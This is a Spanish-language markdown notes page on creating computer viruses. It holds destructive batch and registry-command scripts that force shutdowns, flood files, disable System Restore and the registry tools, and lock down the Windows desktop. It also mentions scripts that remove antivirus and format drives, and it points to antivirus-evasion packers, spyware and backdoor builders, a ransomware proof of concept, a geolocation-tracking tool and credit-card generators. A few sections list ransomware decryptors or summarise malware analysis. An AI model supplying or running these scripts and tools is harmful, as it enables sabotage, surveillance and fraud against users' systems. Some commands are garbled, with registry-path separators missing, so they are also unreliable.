# VmlydXMgSW5mb3Jtw6F0aWNvcw==

- [VmlydXMgSW5mb3Jtw6F0aWNvcw==](#vmlydxmgsw5mb3jtw6f0awnvcw)
  - [Introducción](#introducción)
    - [Malware, Virus, Gusanos, Spyware, Troyanos](#malware-virus-gusanos-spyware-troyanos)
  - [Métodos](#métodos)
    - [Cómo hacer una bomba electrónica](#cómo-hacer-una-bomba-electrónica)
      - [Ejemplo, apagar PC](#ejemplo-apagar-pc)
      - [Ejemplo, generar múltiples archivos](#ejemplo-generar-múltiples-archivos)
      - [Ejemplo TeraBIT Virus Maker y .BAT](#ejemplo-terabit-virus-maker-y-bat)
      - [Comandos de Windows](#comandos-de-windows)
  - [Crear USB](#crear-usb)
  - [Crear un Spyware](#crear-un-spyware)
  - [Troyanos](#troyanos)
  - [PC infectados](#pc-infectados)
  - [Crear un ROOKIT](#crear-un-rookit)
  - [Ejemplos de Ransomware](#ejemplos-de-ransomware)
  - [ROOKIT](#rookit)
  - [Ransomware desde el inicio](#ransomware-desde-el-inicio)
  - [Virus en Linux](#virus-en-linux)
    - [Múltiples módulos de puerta trasera con características de spyware](#múltiples-módulos-de-puerta-trasera-con-características-de-spyware)
    - [La Int80h y Linux](#la-int80h-y-linux)
  - [Geolocalización](#geolocalización)
    - [Creación de un Ransomweare con Python](#creación-de-un-ransomweare-con-python)
    - [Seeker: Geolocalización](#seeker-geolocalización)
    - [Generar Credit Card con Termux](#generar-credit-card-con-termux)
  - [Firewalls](#firewalls)
  - [Red Privada Virtual](#red-privada-virtual)
  - [Protección con cifrado sin opción de captura de pantalla](#protección-con-cifrado-sin-opción-de-captura-de-pantalla)
  - [Canales Telegram](#canales-telegram)
  - [Permisos a dispositivos Bluetooth](#permisos-a-dispositivos-bluetooth)
  - [Virus para Windows](#virus-para-windows)

___

## Introducción

### Malware, Virus, Gusanos, Spyware, Troyanos

- **Malware**, es un software malicioso.
- **Gusanos**, no necesitan intervención para su ejecución, como si lo requieren los **virus**. Se replican por si mismos.
- **Troyanos**, similar al **virus** informático. Su funcionamiento no es exactamente el mismo. Un **virus** es destructivo, un **troyano** intenta acceder para ejecutar acciones ocultas con las que abrir puertas traseras.
- **Spyware** se ejecuta por si solo, su propósito es recuperar información. Su intención no es dañar los dispositivos.
- **Ransomware**, software de rescate, lo que hace es secuestrar los datos de un Host para pedir un rescate por su liberación. Lo que hace es encriptar los datos.

[elhacker.INFO](https://elhacker.info/descargas.html)
___

## Métodos

### Cómo hacer una bomba electrónica

Crea un archivo con extensión *.bat* para OS W10. Para ejecutar hacer clic sobre el fichero.

#### Ejemplo, apagar PC

> @ echo off
> shutdown.exe -s -t 00 "virus detectado el OS se apagará"

#### Ejemplo, generar múltiples archivos

> @ echo off
> color @ amsg "You have just launched BloatWarez %random% :Reckon echo This is bloatware #%random% >
> C:\Test\%random%%random%.virus.txtgoto Reckon

#### Ejemplo TeraBIT Virus Maker y .BAT

Desde el siguiente enlace se descarga la aplicación para crear virus:

[TeraBIT Virus Maker](https://www.mediafire.com/file/o3a5t7j6052sqq6/TeraBIT_Virus_Maker_3.2.rar)

Con la aplicación **THEMIDA** encripta el fichero con el virus para que el Antivirus no lo detecta.

[Themida](https://www.oreans.com/themida.php)
[Themida-GitHub](https://github.com/redgate4/Themida)

Se adjuntan 6 ficheros .bat con diferentes ejemplos de virus:

1. Apaga el PC. Ir al escritorio, crear acceso directo, al primero poner `shutdown -s -t "5" -c "Introducir mensaje"` después el nombre del archivo y ya está.
2. Eliminación del antivirus.
3. Formatear el PC.
4. Mil pantallas. Abrirá el CMD muchas veces.
5. Formatear y prohibir. Borra todo y no deja entrar.
6. Start. Con más *start* más bloquea.

#### Comandos de Windows

En la consola de Windows CMD, los comandos a probar:

- `adduser`.
- `net user username password /ADD`. Para crear cuentas netas de usuario y contraseña.
- `ping www.google.com -n 10`. Envía 10 paquetes.
- `ping www.google.com -w 6000`. Tiempo de espera 6 segundos.
- `ping www.google.com -f -l 1472`. Permite la fragmentación de paquetes.
- `ping www.google.com -a norfipc.com`. Resolver los nombre de dominios.
- `ping www.google.com -i 50`. Tiempo de vida.
- `ping www.google.com -r 3`.
- `nslookup www.google.com`. *Name Server Look Up*. Obtiene DNS.
- `nslookup 216.58.211.195`.
- `nslookup -type=ns unizar.es`.
- `nslookup www.google.com /finger`.
- `nslookup lserver www.wikipedia.com`.
- `tracert /?`. Muestra la información del comando.
- `tracert 8.8.8.8`. Determina el tiempo del paquete hasta el destino.
- `tracert -h 30 www.google.com`. Máxima cantidad de saltos en la búsqueda del objetivo.
- `tracert -R www.google.com`. Seguir ruta de retorno (solo IPv6).
- `tracert -4 www.google.com`. Forzar para IPv4.
- `arp -a`. Muestra entradas ARP (Address Resolution Protocol) actuales.
- `arp -d`. Borra la caché.
- `ipconfig /all`. Muestra toda la información de adaptadores de red.
- `ipconfig /flushdns`. Limpia la memoria caché.
- `ipconfig /relase`. Libera la dirección IP del adaptador de red.
- `ipconfig /renew`. Renueva la dirección IP.
- `ipconfig /displaydns`. Muestra contenido del DNS.
- `ipconfig /registerdns`. Actualiza lista DNS.
- `ipconfig /showclasid`. Muestra información del adaptador.
- `ipconfig /setclasid`.
- `ipconfig /allcompartments`.
- `netstat -a`. Muestra todas las conexiones activas.
- `netstat -e`. Muestra estadísticas paquetes entrantes.
- `netstat -f`. Muestra dominios y direcciones.
- `netstat -n`. Muestra los números de puertos.
- `netstat -o`. Muestra el ID en cada proceso.
- `netstat -p tcp`. Muestra protocolo TCP, también puede ser UDP.
- `netstat -q`. Muestra los puertos de escucha.
- `netstat -s`. Muestra las estadísticas por protocolos.
- `netstat -r`. Muestra tablas de enrutamiento de las redes actuales.
- `netstat -t`. Muestra información de las conexiones.
- `netsh`. Sirve para configurar redes inalambricas.
- `netsh interface ipv4 show interfaces`. Muestra tabla estado de conexiones.
- `netsh wlan show profiles`. Muestra perfiles de interfaz WiFi.
- `netsh advfirewall firewall show rule name-all`.
- `netsh interface ipv6 show address`.
- `netsh trace start capture-yes`.
- `netsh winsock reset`.
- `netsh -b`. Muestra configuración global.
- `netsh interface tcp show global`.
- `netsh interface tcp set global autotuning=normal`. Estable ajuste automático TCP.
- `sfc /scannow:`. Sirve para reparar archivos dañados de Windows.
- `sfc /scannow`. Escanea el HD y repara archivos dañados.
- `chkdsk`.
- `ssh-keygen`. Genera una clave, requiere añadir clave pública.
- `ssh -X usuario@direccion_ip`. Para acceder a un Host.
- `ssh -O check usuario@direccion_ip`. Envía un comando a una sesión establecida.
- `ssh -p 2222 usuario@direccion_ip`. Especificamos un puerto.
- `ssh -L 8080:localhost:80 usuario@direccion_ip`. Reenvío de puerto local.
- `ssh -R 8080:localhost:80 usuario@direccion_ip`. Reenvío de puerto remoto.
- `ssh -X usuario@direccion_ip`. Ejecuta aplicaciones gráficas.
- `ssh usuario@dir_ip 'comando'`. Ejecuta comando en remoto.
- `scp /ruta/archivo_local usuario@direccion_ip:/ruta/archivo_remoto`.
- `ssh -S /tmp/ssh_socket usuario@dir_ip`. Sirve para cerrar una conexión.
- `ssh -M -S /tmp/ssh_socket usuario@dir_ip`. Estable conexión maestro.
- `chkdsk`. Utilidad para analizar y reparar el HD.
- `chkdsk /f`. Repara fichero.
- `chkdsk /r`. Recupera datos.
- `chkdsk /x`. Desmonta la unidad.
- `chkdsk /v`. Muestra la ruta cuando se realiza la comprobación.
- `chkdsk E: /f`. Análisis en otra unidad HD.
- `chkdsk /scan`. Analiza el HD sin desmontarlo, en formato NTFS.
- `chkdsk /b`. Restablecer la vista de los clusters dañados.
- `chkdsk /i`. Realiza el análisis más rápido.
- `chkdsk /c`. Análisis superficial.

Herramienta para la descarga de documentos, está en repositorio GitHub:

[Megabastard](https://github.com/tonikelope/megabasterd/releases)
___

## Crear USB

Crea un USB bootable con Kali-Lunux.

[USB Bootable](https://www.kali.org/docs/usb/live-usb-install-with-linux/)
___

## Crear un Spyware

Se instalará el paquete **Maven** y el **JDK** de Java. Para OS Linux:

> sudo apt install maven default-jdk default-jre openjdk-8-jdk openjdk-8-jre -y

Para generar un EXE:

> sudo apt install zlib1g-dev libncurses5-dev lib32z1 lib32ncurses5 -y

Clonar de GitHub la herramienta **sAINT**:

> git clone <https://github.com/tiagorlampert/sAINT.git>

[sAINT](https://github.com/tiagorlampert/sAINT)

Una vez instalada la herramienta, requiere de *Email* y *Password*. Posteriormente podremos selccionar: persistencia del malware, uso de webcam entro otros parámetros.
__

## Troyanos

Conjunto de herramientas Python para **pentesters**.

Herramienta **HaCoder.py** del repositorio GitHub.

[HaCoder](https://github.com/marrocamp/HaCoder.py)

>HaCoder.py is script coded by 16 years old Security Researcher/Pentester. It's using AES Encrypted Traffic between Attacker and Victim, I uploaded backdoor to VirusTotal 30 days ago and it's still Fully Undetectable! If it got detectable, just change AES Key and you are ready to rock again!

Si queremos convertir el backdoor *.py* en un *.exe*, se debe usar: *<https://github.com/pyinstaller/pyinstaller>*.

___

## PC infectados

Link para descubrir si los archivos han sido desencriptados: <https://id-ransomware.malwarehunterteam.com/>

Link para software que borra ramsomware: <https://www.emsisoft.com/decrypter/>

Links antivirus para quitar ramsomware: <https://noransom.kaspersky.com/>, <https://www.avast.com/ransomware-decryption-tools>

Link antivirus comunitario: <https://docs.clamav.net/faq/faq-eol.html>
___

## Crear un ROOKIT

Conjunto de herramientas para conseguir derechos de **root**. Se ejecuta en la máquina de la víctima.
___

## Ejemplos de Ransomware

**CryptoLocker** es un ransomware tipo troyano dirigido a computadoras con el sistema operativo Windows que se extendió a finales de 2013. **CryptoLocker** se distribuye de varias formas, una de ellas como archivo adjunto de un correo electrónico y otra, accediendo a través del puerto remoto 3389.
___

## ROOKIT

Usar el **ensamblador** NASM, MASM.
___

## Ransomware desde el inicio

Usar la herramienta **PyCryptodome**.

[PyCryptodome](https://pycryptodome.readthedocs.io/en/latest/src/installation.html#documentation)
___

## Virus en Linux

El nuevo **EvilGnome Backdoor Spies** para Linux, roba sus archivos. Se hace pasar por una extensión de Shell de Gnome.

La infección se automatiza, con la ayuda de un argumento de ejecución automática que se deja en los encabezados de la carga útil autoejecutable que le indica que inicie un archivo *setup.sh* que agregará el agente espía del malware a *~ / .cache / gnome-software / gnome- shell-extensions / folder*, intentando colarse en el sistema de la víctima camuflado como una extensión de Shell.

**EvilGnome** también agregará un script de Shell *gnome-shell-ext.sh* al crontab de la máquina Linux comprometida. Un script diseñado para verificar cada minuto si el agente de spyware aún se está ejecutando.

El *gnome-shell-ext.sh* se ejecuta durante la etapa final del proceso de infección, lo que lleva a que también se inicie el agente de spyware *gnome-shell-ext*.

La configuración de **EvilGnome** se almacena dentro del archivo *rtp.dat*. También se incluye en el archivo de carga útil auto extraíble y permite que la puerta trasera obtenga la dirección IP del servidor de comando y control (C2).

### Múltiples módulos de puerta trasera con características de spyware

El malware viene con cinco módulos, cada uno de ellos diseñado para ejecutarse en un subproceso separado, y el acceso a recursos compartidos (como la configuración) está protegido por mutexes.

Intezer Labs, encontró los siguientes módulos al analizar el implante de puerta trasera **EvilGnome**:

- ShooterAudio: captura el audio del micrófono del usuario y lo carga en C2.
- ShooterImage: captura capturas de pantalla y las carga en C2.
- ShooterFile: escanea el sistema de archivos en busca de archivos recién creados y los carga en C2.
- ShooterPing: recibe nuevos comandos de C2, exfiltrados datos, puede descargar y ejecutar nuevas cargas útiles.
- ShooterKey: no implementado y no utilizado, muy probablemente un módulo de registro de teclas sin terminar.

Todo el tráfico enviado hacia y desde los servidores C2 del malware está cifrado y descifrado por **EvilGnome** con el cifrado de bloque simétrico RC5 utilizando la misma clave con la ayuda de una variante de la biblioteca de código abierto *RC5Simple*.

Usa el puerto 3436 para conectarse a sus servidores C2 a través de SSH, con “dos servidores adicionales con nombres de dominio similares al patrón de denominación de los dominios Gamaredon (el uso de .space TTLD y ddns)” encontrado por los investigadores en EvilGnome Proveedor de host C2.

### La Int80h y Linux

La interrupción, 80h. Vamos a tener 256 posibilidades, que se indican en *AL* (bueno, podemos hacer un *MOV EAX,<valor\>* igualmente).

Hay algunas diferencias básicas con el sistema de Ms-Dos. La primera es más "teórica" y hace referencia a la seguridad. Cuando estamos ejecutando normalmente, el procesador tiene privilegio de "usuario". Cuando llamamos a la **INT80h**, pasamos a estado de supervisor y el control de todo lo toma el kernel. Al terminar de ejecutarse la interrupción, el procesador vuelve a estar en sistema *usuario* (y por supuesto con nivel de usuario el proceso no puede tocar la tabla de interrupciones).

Con Ms-Dos digamos que siempre estamos en supervisor, podemos cambiar los valores que nos salga de la tabla de interrupciones y hasta escribir sobre el kernel, pero lo importante, que con este sistema, en Linux está todo "cerrado", no hay fisuras (excepto posibles "bugs", que son corregidos, a diferencia de Windows).

Respecto al paso de parámetros, se utilizan por órden *EBX*, *ECX*, etc. Y si la función de interrupción requiere muchos parámetros y no caben en los registros, lo que se hace es almacenar en *EBX+ un puntero a los parámetros.

`mov eax, 05h` ; Función OpenDir (para abrir un directorio para leer sus contenidos)

`lea ebx, [diractual]` ; LEA funciona como un "MOV EBX, offset diractual"; es más cómodo.

`xor ecx, ecx`

`int 080h`

`diractual: db '.',0` ; Queremos que habra el directorio actual, o sea, el '.'

Y también cuidado porque aunque en Linux parece que todo está documentado hay mucho que o no lo está, o incluso está mal (si alguien se ha tenido que mirar la estructura DIRENT sabrá de qué le hablo, es más difícil hacer un *FindFirst/FindNext* en ASM en Linux que infectar un *ELF*)
___

## Geolocalización

### Creación de un Ransomweare con Python

Crear nuestro propio ransomware a partir de una prueba de concepto (POC) disponible en *mauri870* en *github.com*. [Ransomware](https://github.com/mauri870/ransomware).

Este ransomware como parte de su programa académico y no está diseñado con fines maliciosos sino para ayudarnos a comprender cómo funciona el ransomware. Al igual que la nueva variante, Snake, y un número cada vez mayor de cepas de malware, este malware está escrito en Golang.

Este malware cifra los archivos en segundo plano con AES-256-CTR y utiliza RSA-4096 para asegurar el intercambio de datos con el servidor. Es muy similar a *Cryptolocker*, uno de los ataques de ransomware más exitosos de la historio.

### Seeker: Geolocalización

Los parámetros que obtendrás: longitud, latitud, exactitud, altitud, dirección y velocidad (los dos últimos solo si el usuario se está moviendo.)

Enlace GitHub para **Seeker**: [Seeker](https://github.com/thewhiteh4t/seeker)

Una vez clonado de GitHub:
> chmod 777 install.sh
> ./install.sh

### Generar Credit Card con Termux

URL CC Generar Credit Card [Credit Card](https://www.creditcardrush.com/credit-card-generator/)

[ccgen](https://github.com/topics/ccgen)
___

## Firewalls

Práctica para bloquear el **Ransomware** en el Router.
___

## Red Privada Virtual

**VPN**. Un Host, ubicado en la red local, a través de una red pública, se conecta con otra red local.

**IPsec** Internet Protocol Securite.

1. Se debe definir el algoritmo de encritación, por ejemplo: DES, AES.
2. Autenticación de los protocolos, se usa: Chap.
3. Establecida la comunicación por túnel se envían los paquetes de datos.

Herramienta para crear **VPN**, es *ProtonVPN*: [ProtonVPN](https://protonvpn.com/es-es)
___

## Protección con cifrado sin opción de captura de pantalla

Se necesitan dos Apps: **Orbot** y **Onion Messenger**.

Chat 100% cifrado protegido sin posibilidad de captura de pantalla ni grabar pantalla.
___

## Canales Telegram

[Búsquedas](https://new-hidden-wiki.github.io/2024/)<br>
[Documentales](https://www.documaniatv.com/)<br>
[Biblioteca virtual](https://thehiddenwiki.org/2021/12/)<br>
[Explot Dababase](https://www.exploit-db.com/)<br>
[Libros](https://mega.nz/file/nFBy1RwK#YO7n2eINYr9-jwgMNE-M1oZS4k5nZyERZHGCZarPPAY)
___

## Permisos a dispositivos Bluetooth

App Audio Bluetooth Widgets Free.
___

## Virus para Windows

Fuente: [blog](https://hackeardeformasimple.blogspot.com/)

Programar el PC para un reinicio cada 2 segundos:

    Reg add hklmsoftwaremicrosoftwindowscurrentversionrun /v off /t reg_sz /d logoff.exe /f

    Reg add hklmsoftwarePoliciesMicrosoftwindows NTSystemRestore /v DisableConfig /t reg_dword /d 1

    Reg add hklmsoftwarePoliciesMicrosoftwindows NTSystemRestore /v DisableSR /t reg_dword /d 1

    Reg add hkcusoftwaremicrosoftwindowscurrentversionPoliciesexplorer /v NoClose /t reg_dword /d 1

    Reg add hkcusoftwaremicrosoftwindowscurrentversionPoliciesexplorer /v NoFavoritesMenu /t reg_dword /d 1

    Reg add hkcusoftwaremicrosoftwindowscurrentversionPoliciesexplorer /v NoFind /t reg_dword /d 1

    Reg add hkcusoftwaremicrosoftwindowscurrentversionPoliciesexplorer /v NoRecentDocsMenu /t reg_dword /d 1

    Reg add hkcusoftwaremicrosoftwindowscurrentversionPoliciesexplorer /v NoRecentDocsHistory /t reg_dword /d 1

    Reg add hkcusoftwaremicrosoftwindowscurrentversionPoliciesexplorer /v NoSetFolders /t reg_dword /d 1

    Reg add hkcusoftwaremicrosoftwindowscurrentversionPoliciesexplorer /v NoSetTaskbar /t reg_dword /d 1

    Reg add hkcusoftwaremicrosoftwindowscurrentversionPoliciesexplorer /v NoFileMenu /t reg_dword /d 1

    Reg add hkcusoftwaremicrosoftwindowscurrentversionPoliciesexplorer /v NoViewContextMenu /t reg_dword /d 1

    Reg add hkcusoftwaremicrosoftwindowscurrentversionPoliciesexplorer /v NoTrayContextMenu /t reg_dword /d 1

    Reg add hkcusoftwaremicrosoftwindowscurrentversionPoliciesexplorer /v NoDesktop /t reg_dword /d 1

    Reg add hkcusoftwaremicrosoftwindowscurrentversionPoliciesexplorer /v NoWinKey
    
    Reg add hkcusoftwaremicrosoftwindowscurrentversionPoliciesActiveDesktop /v NoChangingWallpaper /t reg_dword /d 1

    Reg add hkcusoftwaremicrosoftwindowscurrentversionPoliciesActiveDesktop /v NoAddingComponents /t reg_dword /d 1

    Reg add hkcusoftwaremicrosoftwindowscurrentversionPoliciesActiveDesktop /v NoDeletingComponents /t reg_dword /d 1

    Reg add hkcusoftwaremicrosoftwindowscurrentversionPoliciesActiveDesktop /v NoEditingComponents /t reg_dword /d 1

    Reg add hkcusoftwaremicrosoftwindowscurrentversionPoliciesActiveDesktop /v NoHTMLWallpaper /t reg_dword /d 1

    Reg add hkcusoftwaremicrosoftwindowscurrentversionPoliciessystem /v DisableRegistryTools /t reg_dword /d 1

    shutdown -s -t 5 -f -c "El ordenador se apagara"

Para repararlo, se podrían entrar en modo a prueba de fallos, acceder a al editor de registro, o a restaurar sistema.

El código contiene algunas líneas, que impide el acceso a restaurar sistema y a reggedit entre otros. Algunas líneas son simplemente para incordiar (como por ejemplo, impedir que el usuario pueda acceder a apagar el sistema desde alt+f4, ni inicio, ni ninguno de este tipo, o el que impide que pueda modificar cualquier archivo del escritorio, o el que inutiliza el clic derecho del ratón)
